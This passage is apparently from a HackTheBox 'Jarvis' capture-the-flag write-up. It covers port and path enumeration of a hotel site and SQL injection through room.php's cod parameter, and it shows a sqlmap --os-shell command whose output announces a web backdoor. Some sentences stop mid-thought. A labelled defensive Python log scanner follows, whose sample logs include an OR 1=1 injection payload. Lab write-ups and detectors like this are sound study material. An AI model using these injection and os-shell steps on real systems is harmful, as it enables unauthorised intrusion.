The initial scan shows SSH and a web server, and nmap cannot pin down the OS:

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see ).

Web servers are typically the first service I investigate, so I view the site first. The page appears to be for a hotel, and the IP should likely resolve to ‘supersecurehotel.htb’. Most of the site’s functionality does not appear to work, namely sign-in, book-in, and utilities.

Running a web-path scanner enumerates a few hidden files and directories, with /index.php/login/ and /phpmyadmin capturing most of my

Desktop/dirsearch/dirsearch/dirsearch.py -u 10.10.10.143 -e *
Extensions: 10.10.10.13.gnmap | HTTP method: get | Threads: 10 | Wordlist size: 6086
Error Log: /root/Desktop/dirsearch/dirsearch/logs/errors-19-07-30_23-55-24.log

Viewing the first only loads the page seen before over plain HTTP. The second page of interest loads a phpMyAdmin login panel. I unsuccessfully try to authenticate with a few known default credentials. The error message reveals that MySQL is part of the technology stack, but this information is already known if the attacker has familiarity with phpMyAdmin.

Viewing the high-port page loads the following text and nothing else: ‘Hey you have been banned for 90 seconds, don’t be bad’. I ran a web-path scanner from this page but no meaningful results were returned. The message appears to suggest that a WAF is monitoring the site.

Since I haven’t found a foothold at this point, I return to reviewing the main site and discover that room.php takes an input parameter named cod that reads the hotel’s rooms from its database and prints them out on the page. I was able to view six different rooms for booking by entering inputs 1 through 6. Entering an unexpected input doesn’t return an error, but does load a blank page. The ‘cod’ parameter in room.php appears to be a potential SQL injection point due to this behavior. I attempt to inject an always-true condition below to test for a classic SQL injection; however, my input is sanitized with URL-encoding and fails to return the requested

sqlmap -r /root/Desktop/HTB/jarvis/jarvis.req --os-shell

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
parsing HTTP request from '/root/Desktop/HTB/jarvis/jarvis.req'
Sqlmap resumed the following injection point(s) from stored session:
Title: AND boolean-based blind - WHERE or HAVING clause
Title: MySQL >= 5.0.12 AND time-based blind
Title: Generic UNION query (NULL) - 7 columns
Web server operating system: Linux Debian 9.0 (stretch)
Web application technology: Apache 2.4.25
going to use a web backdoor for command prompt
fingerprinting the back-end DBMS operating system
the back-end DBMS operating system is Linux
Which web application language does the web server support?
unable to automatically retrieve the web server document root
What do you want to use for writable directory?
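The behaviour described above, the numeric cod parameter of room.php and the 90-second ban message, as an added defender-side example that is not part of the original writeup: it parses constructed Apache access-log lines, flags room.php requests whose cod value is not a plain integer (the site only accepts 1 to 6) or that carry sqlmap's default user agent, and emulates a 90-second per-IP ban window. The log lines, IPs and timestamps are constructed for illustration.

```python
"""Added example: flag probing of room.php?cod= in Apache access logs and
emulate the 90-second per-IP ban. All log lines, IPs and times are constructed."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

# Apache Combined Log Format: ip ident user [ts] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
BAN_SECONDS = 90  # the banner on the high port says 90 seconds

SAMPLE_LOG = [  # constructed sample lines
    '10.10.14.5 - - [30/Jul/2019:23:55:24 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [30/Jul/2019:23:55:40 +0000] "GET /room.php?cod=3%27%20OR%201%3D1--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [30/Jul/2019:23:56:02 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [30/Jul/2019:23:56:10 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "sqlmap/1.3 (http://sqlmap.org)"',
    '10.10.14.5 - - [30/Jul/2019:23:58:00 +0000] "GET /room.php?cod=2 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), path and ua, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("req").split(" ")[1]  # "GET /path HTTP/1.1" -> "/path"
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": path, "ua": m.group("ua")}

def suspicious_cod(path):
    """True when room.php gets a cod value that is not a plain integer (legitimate values are 1-6)."""
    parts = urlsplit(path)
    if not parts.path.endswith("/room.php"):
        return False
    values = parse_qs(parts.query, keep_blank_values=True).get("cod", [])
    # decode a second time so double-URL-encoded payloads are judged on their real value
    return any(not unquote(unquote(v)).strip().isdigit() for v in values)

def scan(lines):
    """Return (flagged requests, ban expiry per IP); each flagged request bans its IP for BAN_SECONDS."""
    flagged, ban_until = [], {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if suspicious_cod(rec["path"]) or "sqlmap" in rec["ua"].lower():
            flagged.append((rec["ip"], rec["ts"], rec["path"]))
            ban_until[rec["ip"]] = rec["ts"] + timedelta(seconds=BAN_SECONDS)
    return flagged, ban_until

def is_blocked(ip, ts, ban_until):
    """True if a request from ip at time ts falls inside that IP's ban window."""
    return ip in ban_until and ts < ban_until[ip]
```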